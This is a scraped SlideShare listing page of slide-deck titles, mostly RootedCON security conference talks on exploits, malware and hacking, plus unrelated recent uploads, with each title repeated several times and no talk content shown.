Chema Alonso - Dorking, Pentesting & Hacking con Android Apps [rootedvlc2]Chema Alonso - Dorking, Pentesting & Hacking con Android Apps [rootedvlc2]
Chema Alonso - Dorking, Pentesting & Hacking con Android Apps [rootedvlc2]
 
Layakk - Atacando 3G Vol. 2 [rootedvlc2]
Layakk - Atacando 3G Vol. 2 [rootedvlc2]Layakk - Atacando 3G Vol. 2 [rootedvlc2]
Layakk - Atacando 3G Vol. 2 [rootedvlc2]
 
RootedSatellite Valencia - Charla inaugural [RootedSatellite Valencia]
RootedSatellite Valencia - Charla inaugural [RootedSatellite Valencia]RootedSatellite Valencia - Charla inaugural [RootedSatellite Valencia]
RootedSatellite Valencia - Charla inaugural [RootedSatellite Valencia]
 
Leonardo Nve - Explotando cambios en servidores DNS [RootedSatellite Valencia]
Leonardo Nve - Explotando cambios en servidores DNS [RootedSatellite Valencia]Leonardo Nve - Explotando cambios en servidores DNS [RootedSatellite Valencia]
Leonardo Nve - Explotando cambios en servidores DNS [RootedSatellite Valencia]
 
Cesar Lorenzana & Javier Rodríguez – Por qué lo llaman APT´s, cuando lo que q...
Cesar Lorenzana & Javier Rodríguez – Por qué lo llaman APT´s, cuando lo que q...Cesar Lorenzana & Javier Rodríguez – Por qué lo llaman APT´s, cuando lo que q...
Cesar Lorenzana & Javier Rodríguez – Por qué lo llaman APT´s, cuando lo que q...
 
Alberto Cita - Skype Sin Levita. Un análisis de seguridad y privacidad [Roote...
Alberto Cita - Skype Sin Levita. Un análisis de seguridad y privacidad [Roote...Alberto Cita - Skype Sin Levita. Un análisis de seguridad y privacidad [Roote...
Alberto Cita - Skype Sin Levita. Un análisis de seguridad y privacidad [Roote...
 
Lorenzo Martínez - Cooking an APT in the paranoid way [RootedSatellite Valen...
Lorenzo Martínez  - Cooking an APT in the paranoid way [RootedSatellite Valen...Lorenzo Martínez  - Cooking an APT in the paranoid way [RootedSatellite Valen...
Lorenzo Martínez - Cooking an APT in the paranoid way [RootedSatellite Valen...
 
Jorge Ramió - RSA cumple 36 años y se le ha caducado el carné joven [Rooted C...
Jorge Ramió - RSA cumple 36 años y se le ha caducado el carné joven [Rooted C...Jorge Ramió - RSA cumple 36 años y se le ha caducado el carné joven [Rooted C...
Jorge Ramió - RSA cumple 36 años y se le ha caducado el carné joven [Rooted C...
 
Raul Siles - iOS: Regreso al futuro [Rooted CON 2014]
Raul Siles - iOS: Regreso al futuro [Rooted CON 2014]Raul Siles - iOS: Regreso al futuro [Rooted CON 2014]
Raul Siles - iOS: Regreso al futuro [Rooted CON 2014]
 
Pablo San Emeterio - How to protect your hot pics with WHF [RootedSatellite V...
Pablo San Emeterio - How to protect your hot pics with WHF [RootedSatellite V...Pablo San Emeterio - How to protect your hot pics with WHF [RootedSatellite V...
Pablo San Emeterio - How to protect your hot pics with WHF [RootedSatellite V...
 
David Pérez y José Pico - I wanna jam it wid you [RootedSatellite Valencia]
David Pérez y José Pico - I wanna jam it wid you [RootedSatellite Valencia]David Pérez y José Pico - I wanna jam it wid you [RootedSatellite Valencia]
David Pérez y José Pico - I wanna jam it wid you [RootedSatellite Valencia]
 
Cesar Lorenzana - Picoletos en Rootedland [RootedSatellite Valencia]
Cesar Lorenzana - Picoletos en Rootedland [RootedSatellite Valencia]Cesar Lorenzana - Picoletos en Rootedland [RootedSatellite Valencia]
Cesar Lorenzana - Picoletos en Rootedland [RootedSatellite Valencia]
 
Aladdin Gurbanov – Magnetic Road [Rooted CON 2014]
Aladdin Gurbanov – Magnetic Road [Rooted CON 2014]Aladdin Gurbanov – Magnetic Road [Rooted CON 2014]
Aladdin Gurbanov – Magnetic Road [Rooted CON 2014]
 
Pau Oliva – Bypassing wifi pay-walls with Android [Rooted CON 2014]
Pau Oliva – Bypassing wifi pay-walls with Android [Rooted CON 2014]Pau Oliva – Bypassing wifi pay-walls with Android [Rooted CON 2014]
Pau Oliva – Bypassing wifi pay-walls with Android [Rooted CON 2014]
 
Manu Quintans & Frank Ruiz – 50 shades of crimeware [Rooted CON 2014]
Manu Quintans & Frank Ruiz – 50 shades of crimeware [Rooted CON 2014]Manu Quintans & Frank Ruiz – 50 shades of crimeware [Rooted CON 2014]
Manu Quintans & Frank Ruiz – 50 shades of crimeware [Rooted CON 2014]
 
Pablo San Emeterio López & Jaime Sánchez – WhatsApp, mentiras y cintas de vid...
Pablo San Emeterio López & Jaime Sánchez – WhatsApp, mentiras y cintas de vid...Pablo San Emeterio López & Jaime Sánchez – WhatsApp, mentiras y cintas de vid...
Pablo San Emeterio López & Jaime Sánchez – WhatsApp, mentiras y cintas de vid...
 
Vicente Díaz - Birds, bots and machines - Fraud in Twitter and how to detect ...
Vicente Díaz - Birds, bots and machines - Fraud in Twitter and how to detect ...Vicente Díaz - Birds, bots and machines - Fraud in Twitter and how to detect ...
Vicente Díaz - Birds, bots and machines - Fraud in Twitter and how to detect ...
 
Hugo Teso - Profundizando en la seguridad de la aviación [Rooted CON 2014]
Hugo Teso - Profundizando en la seguridad de la aviación [Rooted CON 2014]Hugo Teso - Profundizando en la seguridad de la aviación [Rooted CON 2014]
Hugo Teso - Profundizando en la seguridad de la aviación [Rooted CON 2014]
 
Alfonso Muñoz – Ocultación de comunicaciones en lenguaje natural [Rooted CON ...
Alfonso Muñoz – Ocultación de comunicaciones en lenguaje natural [Rooted CON ...Alfonso Muñoz – Ocultación de comunicaciones en lenguaje natural [Rooted CON ...
Alfonso Muñoz – Ocultación de comunicaciones en lenguaje natural [Rooted CON ...
 

Ähnlich wie Jose Selvi - Adaptando exploits para evitar la frustración [RootedSatellite Valencia]

Rails Against The Machine
Rails Against The MachineRails Against The Machine
Rails Against The Machineguestae6a05
 
Introducción a phone gap
Introducción a phone gapIntroducción a phone gap
Introducción a phone gapRodrigo Corral
 
Nodejs.introduccion
Nodejs.introduccionNodejs.introduccion
Nodejs.introduccionkillfill
 
La Caja de Herramientas del Desarrollador Moderno PHPConferenceAR
La Caja de Herramientas del Desarrollador Moderno PHPConferenceARLa Caja de Herramientas del Desarrollador Moderno PHPConferenceAR
La Caja de Herramientas del Desarrollador Moderno PHPConferenceARPablo Godel
 
Jruby On Rails. Ruby on Rails en la JVM
Jruby On Rails. Ruby on Rails en la JVMJruby On Rails. Ruby on Rails en la JVM
Jruby On Rails. Ruby on Rails en la JVMjavier ramirez
 
Deployer PHP. Presentación para #PHPSevilla
Deployer PHP. Presentación para #PHPSevillaDeployer PHP. Presentación para #PHPSevilla
Deployer PHP. Presentación para #PHPSevillaAgencia INNN
 
PHPVigo #19 - Lightning variables de entorno
PHPVigo #19 - Lightning variables de entornoPHPVigo #19 - Lightning variables de entorno
PHPVigo #19 - Lightning variables de entornoRolando Caldas
 
Lw2010 Pedro Valera
Lw2010 Pedro ValeraLw2010 Pedro Valera
Lw2010 Pedro Valeraguestf280e2
 
Debian Lenny Asterisk
Debian Lenny AsteriskDebian Lenny Asterisk
Debian Lenny Asteriskmanzurek
 
Scripting para Pentesters v1.0
Scripting para Pentesters v1.0Scripting para Pentesters v1.0
Scripting para Pentesters v1.0wcuestas
 
PHPAJAX
PHPAJAXPHPAJAX
PHPAJAXrodasc
 
Optimización de Aplicaciones Android para X86
Optimización de Aplicaciones Android para X86Optimización de Aplicaciones Android para X86
Optimización de Aplicaciones Android para X86Software Guru
 

Ähnlich wie Jose Selvi - Adaptando exploits para evitar la frustración [RootedSatellite Valencia] (20)

Los mejores trucos de Asterisk
Los mejores trucos de AsteriskLos mejores trucos de Asterisk
Los mejores trucos de Asterisk
 
Rails Against The Machine
Rails Against The MachineRails Against The Machine
Rails Against The Machine
 
Introducción a phone gap
Introducción a phone gapIntroducción a phone gap
Introducción a phone gap
 
Nodejs.introduccion
Nodejs.introduccionNodejs.introduccion
Nodejs.introduccion
 
Memorias
MemoriasMemorias
Memorias
 
La Caja de Herramientas del Desarrollador Moderno PHPConferenceAR
La Caja de Herramientas del Desarrollador Moderno PHPConferenceARLa Caja de Herramientas del Desarrollador Moderno PHPConferenceAR
La Caja de Herramientas del Desarrollador Moderno PHPConferenceAR
 
JRuby al Rescate de J2EE
JRuby al Rescate de J2EEJRuby al Rescate de J2EE
JRuby al Rescate de J2EE
 
Taller de Capistrano
Taller de CapistranoTaller de Capistrano
Taller de Capistrano
 
Docker ECS en AWS
Docker ECS en AWS Docker ECS en AWS
Docker ECS en AWS
 
Jruby On Rails. Ruby on Rails en la JVM
Jruby On Rails. Ruby on Rails en la JVMJruby On Rails. Ruby on Rails en la JVM
Jruby On Rails. Ruby on Rails en la JVM
 
Deployer PHP. Presentación para #PHPSevilla
Deployer PHP. Presentación para #PHPSevillaDeployer PHP. Presentación para #PHPSevilla
Deployer PHP. Presentación para #PHPSevilla
 
PHPVigo #19 - Lightning variables de entorno
PHPVigo #19 - Lightning variables de entornoPHPVigo #19 - Lightning variables de entorno
PHPVigo #19 - Lightning variables de entorno
 
Lw2010 Pedro Valera
Lw2010 Pedro ValeraLw2010 Pedro Valera
Lw2010 Pedro Valera
 
Debian Lenny Asterisk
Debian Lenny AsteriskDebian Lenny Asterisk
Debian Lenny Asterisk
 
Practica 8
Practica 8Practica 8
Practica 8
 
Scripting para Pentesters v1.0
Scripting para Pentesters v1.0Scripting para Pentesters v1.0
Scripting para Pentesters v1.0
 
PHPAJAX
PHPAJAXPHPAJAX
PHPAJAX
 
Varnish http cache
Varnish http cacheVarnish http cache
Varnish http cache
 
Seguridad en i pv6 (2)
Seguridad en  i pv6 (2)Seguridad en  i pv6 (2)
Seguridad en i pv6 (2)
 
Optimización de Aplicaciones Android para X86
Optimización de Aplicaciones Android para X86Optimización de Aplicaciones Android para X86
Optimización de Aplicaciones Android para X86
 

Mehr von RootedCON

rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...RootedCON
 
Rooted2020 hunting malware-using_process_behavior-roberto_amado
Rooted2020 hunting malware-using_process_behavior-roberto_amadoRooted2020 hunting malware-using_process_behavior-roberto_amado
Rooted2020 hunting malware-using_process_behavior-roberto_amadoRootedCON
 
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_RootedCON
 
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...RootedCON
 
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...RootedCON
 
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...RootedCON
 
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguerRooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguerRootedCON
 
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...RootedCON
 
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemyRooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemyRootedCON
 
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...RootedCON
 
Rooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molinaRooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molinaRootedCON
 
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...RootedCON
 
Rooted2020 todo a-siem_-_marta_lopez
Rooted2020 todo a-siem_-_marta_lopezRooted2020 todo a-siem_-_marta_lopez
Rooted2020 todo a-siem_-_marta_lopezRootedCON
 
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valeroRooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valeroRootedCON
 
Rooted2020 live coding--_jesus_jara
Rooted2020 live coding--_jesus_jaraRooted2020 live coding--_jesus_jara
Rooted2020 live coding--_jesus_jaraRootedCON
 
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...RootedCON
 
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...RootedCON
 
Rooted2020 evading deep-learning_malware_detectors_-_javier_yuste
Rooted2020 evading deep-learning_malware_detectors_-_javier_yusteRooted2020 evading deep-learning_malware_detectors_-_javier_yuste
Rooted2020 evading deep-learning_malware_detectors_-_javier_yusteRootedCON
 
Rooted2020 encontrando 0days-en_2020_-_antonio_morales
Rooted2020 encontrando 0days-en_2020_-_antonio_moralesRooted2020 encontrando 0days-en_2020_-_antonio_morales
Rooted2020 encontrando 0days-en_2020_-_antonio_moralesRootedCON
 
Rooted2020 emotet is-dead_long_live_emotet_-_victor_acin
Rooted2020 emotet is-dead_long_live_emotet_-_victor_acinRooted2020 emotet is-dead_long_live_emotet_-_victor_acin
Rooted2020 emotet is-dead_long_live_emotet_-_victor_acinRootedCON
 

Mehr von RootedCON (20)

rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
 
Rooted2020 hunting malware-using_process_behavior-roberto_amado
Rooted2020 hunting malware-using_process_behavior-roberto_amadoRooted2020 hunting malware-using_process_behavior-roberto_amado
Rooted2020 hunting malware-using_process_behavior-roberto_amado
 
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
 
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
 
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
 
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
 
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguerRooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
 
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
 
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemyRooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemy
 
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
 
Rooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molinaRooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molina
 
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
 
Rooted2020 todo a-siem_-_marta_lopez
Rooted2020 todo a-siem_-_marta_lopezRooted2020 todo a-siem_-_marta_lopez
Rooted2020 todo a-siem_-_marta_lopez
 
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valeroRooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
 
Rooted2020 live coding--_jesus_jara
Rooted2020 live coding--_jesus_jaraRooted2020 live coding--_jesus_jara
Rooted2020 live coding--_jesus_jara
 
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
 
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
 
Rooted2020 evading deep-learning_malware_detectors_-_javier_yuste
Rooted2020 evading deep-learning_malware_detectors_-_javier_yusteRooted2020 evading deep-learning_malware_detectors_-_javier_yuste
Rooted2020 evading deep-learning_malware_detectors_-_javier_yuste
 
Rooted2020 encontrando 0days-en_2020_-_antonio_morales
Rooted2020 encontrando 0days-en_2020_-_antonio_moralesRooted2020 encontrando 0days-en_2020_-_antonio_morales
Rooted2020 encontrando 0days-en_2020_-_antonio_morales
 
Rooted2020 emotet is-dead_long_live_emotet_-_victor_acin
Rooted2020 emotet is-dead_long_live_emotet_-_victor_acinRooted2020 emotet is-dead_long_live_emotet_-_victor_acin
Rooted2020 emotet is-dead_long_live_emotet_-_victor_acin
 

Kürzlich hochgeladen

Explorando la historia y funcionamiento de la memoria ram
Explorando la historia y funcionamiento de la memoria ramExplorando la historia y funcionamiento de la memoria ram
Explorando la historia y funcionamiento de la memoria ramDIDIERFERNANDOGUERRE
 
Google-Meet-como-herramienta-para-realizar-reuniones-virtuales.pptx
Google-Meet-como-herramienta-para-realizar-reuniones-virtuales.pptxGoogle-Meet-como-herramienta-para-realizar-reuniones-virtuales.pptx
Google-Meet-como-herramienta-para-realizar-reuniones-virtuales.pptxAlexander López
 
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIA
Actividad integradora 6    CREAR UN RECURSO MULTIMEDIAActividad integradora 6    CREAR UN RECURSO MULTIMEDIA
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIA241531640
 
LAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptx
LAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptxLAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptx
LAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptxAlexander López
 
LUXOMETRO EN SALUD OCUPACIONAL(FINAL).ppt
LUXOMETRO EN SALUD OCUPACIONAL(FINAL).pptLUXOMETRO EN SALUD OCUPACIONAL(FINAL).ppt
LUXOMETRO EN SALUD OCUPACIONAL(FINAL).pptchaverriemily794
 
Tecnologias Starlink para el mundo tec.pptx
Tecnologias Starlink para el mundo tec.pptxTecnologias Starlink para el mundo tec.pptx
Tecnologias Starlink para el mundo tec.pptxGESTECPERUSAC
 
El uso de las tic en la vida ,lo importante que son
El uso de las tic en la vida ,lo importante  que sonEl uso de las tic en la vida ,lo importante  que son
El uso de las tic en la vida ,lo importante que son241514984
 
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdfPARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdfSergioMendoza354770
 
FloresMorales_Montserrath_M1S3AI6 (1).pptx
FloresMorales_Montserrath_M1S3AI6 (1).pptxFloresMorales_Montserrath_M1S3AI6 (1).pptx
FloresMorales_Montserrath_M1S3AI6 (1).pptx241522327
 
Mapa-conceptual-del-Origen-del-Universo-3.pptx
Mapa-conceptual-del-Origen-del-Universo-3.pptxMapa-conceptual-del-Origen-del-Universo-3.pptx
Mapa-conceptual-del-Origen-del-Universo-3.pptxMidwarHenryLOZAFLORE
 
TEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.ppt
TEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.pptTEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.ppt
TEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.pptJavierHerrera662252
 
Arenas Camacho-Practica tarea Sesión 12.pptx
Arenas Camacho-Practica tarea Sesión 12.pptxArenas Camacho-Practica tarea Sesión 12.pptx
Arenas Camacho-Practica tarea Sesión 12.pptxJOSEFERNANDOARENASCA
 
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptxCrear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptxNombre Apellidos
 
Presentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidadPresentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidadMiguelAngelVillanuev48
 
definicion segun autores de matemáticas educativa
definicion segun autores de matemáticas  educativadefinicion segun autores de matemáticas  educativa
definicion segun autores de matemáticas educativaAdrianaMartnez618894
 
AREA TECNOLOGIA E INFORMATICA TRABAJO EN EQUIPO
AREA TECNOLOGIA E INFORMATICA TRABAJO EN EQUIPOAREA TECNOLOGIA E INFORMATICA TRABAJO EN EQUIPO
AREA TECNOLOGIA E INFORMATICA TRABAJO EN EQUIPOnarvaezisabella21
 
Segunda ley de la termodinámica TERMODINAMICA.pptx
Segunda ley de la termodinámica TERMODINAMICA.pptxSegunda ley de la termodinámica TERMODINAMICA.pptx
Segunda ley de la termodinámica TERMODINAMICA.pptxMariaBurgos55
 
El uso de las TIC's en la vida cotidiana.
El uso de las TIC's en la vida cotidiana.El uso de las TIC's en la vida cotidiana.
El uso de las TIC's en la vida cotidiana.241514949
 
Hernandez_Hernandez_Practica web de la sesion 11.pptx
Hernandez_Hernandez_Practica web de la sesion 11.pptxHernandez_Hernandez_Practica web de la sesion 11.pptx
Hernandez_Hernandez_Practica web de la sesion 11.pptxJOSEMANUELHERNANDEZH11
 
GonzalezGonzalez_Karina_M1S3AI6... .pptx
GonzalezGonzalez_Karina_M1S3AI6... .pptxGonzalezGonzalez_Karina_M1S3AI6... .pptx
GonzalezGonzalez_Karina_M1S3AI6... .pptx241523733
 

Kürzlich hochgeladen (20)

Explorando la historia y funcionamiento de la memoria ram
Explorando la historia y funcionamiento de la memoria ramExplorando la historia y funcionamiento de la memoria ram
Explorando la historia y funcionamiento de la memoria ram
 
Google-Meet-como-herramienta-para-realizar-reuniones-virtuales.pptx
Google-Meet-como-herramienta-para-realizar-reuniones-virtuales.pptxGoogle-Meet-como-herramienta-para-realizar-reuniones-virtuales.pptx
Google-Meet-como-herramienta-para-realizar-reuniones-virtuales.pptx
 
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIA
Actividad integradora 6    CREAR UN RECURSO MULTIMEDIAActividad integradora 6    CREAR UN RECURSO MULTIMEDIA
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIA
 
LAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptx
LAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptxLAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptx
LAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptx
 
LUXOMETRO EN SALUD OCUPACIONAL(FINAL).ppt
LUXOMETRO EN SALUD OCUPACIONAL(FINAL).pptLUXOMETRO EN SALUD OCUPACIONAL(FINAL).ppt
LUXOMETRO EN SALUD OCUPACIONAL(FINAL).ppt
 
Tecnologias Starlink para el mundo tec.pptx
Tecnologias Starlink para el mundo tec.pptxTecnologias Starlink para el mundo tec.pptx
Tecnologias Starlink para el mundo tec.pptx
 
El uso de las tic en la vida ,lo importante que son
El uso de las tic en la vida ,lo importante  que sonEl uso de las tic en la vida ,lo importante  que son
El uso de las tic en la vida ,lo importante que son
 
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdfPARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
 
FloresMorales_Montserrath_M1S3AI6 (1).pptx
FloresMorales_Montserrath_M1S3AI6 (1).pptxFloresMorales_Montserrath_M1S3AI6 (1).pptx
FloresMorales_Montserrath_M1S3AI6 (1).pptx
 
Mapa-conceptual-del-Origen-del-Universo-3.pptx
Mapa-conceptual-del-Origen-del-Universo-3.pptxMapa-conceptual-del-Origen-del-Universo-3.pptx
Mapa-conceptual-del-Origen-del-Universo-3.pptx
 
TEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.ppt
TEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.pptTEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.ppt
TEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.ppt
 
Arenas Camacho-Practica tarea Sesión 12.pptx
Arenas Camacho-Practica tarea Sesión 12.pptxArenas Camacho-Practica tarea Sesión 12.pptx
Arenas Camacho-Practica tarea Sesión 12.pptx
 
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptxCrear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
